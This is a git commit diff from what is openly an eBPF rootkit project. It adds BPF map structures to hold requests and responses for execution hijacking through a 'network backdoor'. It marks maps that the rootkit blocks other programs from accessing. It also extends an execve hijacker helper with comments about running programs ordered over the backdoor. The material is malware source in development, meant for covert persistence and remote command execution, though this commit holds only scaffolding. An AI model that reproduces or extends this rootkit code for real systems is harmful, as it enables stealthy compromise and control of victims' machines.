Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor

2025-12-19 16:23:08 +08:00 · 2022-02-14 20:08:30 -05:00
parent edbaf09c06
commit 2ae705f037
8 changed files with 1678 additions and 1636 deletions
--- a/src/.output/kit.o
+++ b/src/.output/kit.o
--- a/src/.output/kit.skel.h
+++ b/src/.output/kit.skel.h
--- a/src/bin/kit
+++ b/src/bin/kit
--- a/src/common/map_common.h
+++ b/src/common/map_common.h
@@ -1,10 +1,8 @@
 #ifndef __MAP_COMMON_H
 #define __MAP_COMMON_H

-#define RB_EVENT_MAX_MESSAGE_SIZE 512
-
-
 // Ring buffer for kernel->user communication
+#define RB_EVENT_MAX_MESSAGE_SIZE 512
 typedef enum {
    INFO,
    DEBUG,
@@ -19,5 +17,4 @@ struct rb_event {
    event_type_t event_type;
 };

-
 #endif
--- a/src/common/map_prot.h
+++ b/src/common/map_prot.h
@@ -0,0 +1,29 @@
+#ifndef __MAP_PROT_H
+#define __MAP_PROT_H
+
+#include "headervmlinux.h"
+
+/*PRIVATE MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit
+//Exclusive to bpf, see /src/bpf/defs.h
+
+
+/*PROTECTED MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
+
+//Execution hijacking, holder of requesting/response data sent from/to the network backdoor
+#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256
+#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256
+struct exec_hijack_data{ //Map value
+	char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN];
+    char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN];
+};
+
+struct exec_prot_hijack{ //Map
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, 1);
+	__type(key, __u32); //just 1 entry allowed
+	__type(value, struct exec_hijack_data);
+} exec_hijack SEC(".maps");
+
+#endif
--- a/src/ebpf/include/bpf/defs.h
+++ b/src/ebpf/include/bpf/defs.h
@@ -6,10 +6,15 @@
 //Tasks and comms
 #define TASK_COMM_LEN 16

+
+/*PRIVATE MAPS*/
+//Any attempt to access these maps will be blocked by the rookit
+
 //File system data of a running program which opened some fd
 #define FS_OPEN_DATA_PROGRAM_NAME_SIZE 16
 #define FS_OPEN_DATA_FILENAME_SIZE 16
-struct fs_open_data{
+
+struct fs_open_data{ //Map value
 	char* buf;
 	int fd;
 	__u32 pid;
@@ -18,11 +23,17 @@ struct fs_open_data{
 	int is_sudo;
 };

-struct fs_open{
+struct fs_priv_open{ //Map
 	__uint(type, BPF_MAP_TYPE_HASH);
 	__uint(max_entries, 4096);
 	__type(key, __u64); //thread group id(MSB) + pid (LSB)
 	__type(value, struct fs_open_data);
 } fs_open SEC(".maps");

+
+
+/*PROTECTED MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
+//Located at /src/map_prot.h
+
 #endif
--- a/src/helpers/execve_hijack
+++ b/src/helpers/execve_hijack
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -5,8 +5,9 @@
 #include <fcntl.h>
 #include <unistd.h>
 #include <time.h>
-
-char* buf = "A string";
+#include <sys/wait.h>
+#include <bpf/bpf.h>
+#include <bpf/libbpf.h>

 int main(int argc, char* argv[]){
    printf("Hello world from execve hijacker\n");
@@ -22,6 +23,10 @@ int main(int argc, char* argv[]){
        printf("Argument %i is %s\n", ii, argv[ii]);
    }

+    //We proceed to fork() and exec the original program, whilst also executing the one we 
+    //ordered to execute via the network backdoor
+    //int bpf_map_fd = bpf_map_get_fd_by_id()
+
    int fd = open("/tmp/execve_hijack", O_RDWR | O_CREAT | O_TRUNC, 0666);
    
    int ii = 0;